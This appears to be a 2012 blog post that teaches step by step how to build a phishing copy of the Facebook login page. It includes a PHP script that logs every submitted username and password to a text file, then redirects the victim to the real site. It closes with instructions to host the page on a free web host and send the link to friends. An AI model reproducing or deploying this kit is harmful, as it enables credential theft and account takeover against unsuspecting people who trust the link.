Friday, January 27, 2012

hack facebook passwords


One of the efficient and easy way to hack a website is phishing. But when you decided to hack using phishing you should create a page and url as same as the real one with less modification so that the person doesnt find that what you created is an fake one. Here is the easiest method to make a phishing page for facebook and hack using it.Follow the following steps,

STEP 1:
Open a login page of facebook and save it by right clicking.

check the downloaded file…. there will be
one htm file(Welcome to Facebook.htm)
A folder(Welcome to Facebook_files) containing some pics, css files and js files.(this folder contains 3rd type of files that i hv mentioned above.)

STEP 2:
Now open the html file with notepad(right click> open with> notepad).
And then press ctrl +F and search for action and you will find a line as shown in screenshot.
You should get: action=www.facebook.com/login and bla bla bla
Delete all the facebook.com crap, and put: login.php.
Beside action you will see something saying: method=post.
Change “post” to “get”
Save it with name index.html

STEP 3:
Now its time to create login.php file.
Copy the following code to notepad and save it as login.php (Dont forget to change the txt file to all files in save as window).

<?php
header(“Location: http://www.Facebook.com/login.php ”);
$handle = fopen(“passwords.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

STEP 4:
Now its time to put your file online.
For this you have to use a hosting website.
It will be good if you use a free web hosting website.
I will recommend you http://www.000webhost.com/

Here you sing up by creating a free website and login.
There you upload the two files index.php and login.php.
And also the Folder downloaded with facebook login page.
And save it.

Now its done your phishing page for facebook is ready.
Give the url to your friend and if they login using your url their user name and password will saved in a password.txt file, in your profile in web hosting site.

Enjoy Hacking!!!!!!

No comments:

Post a Comment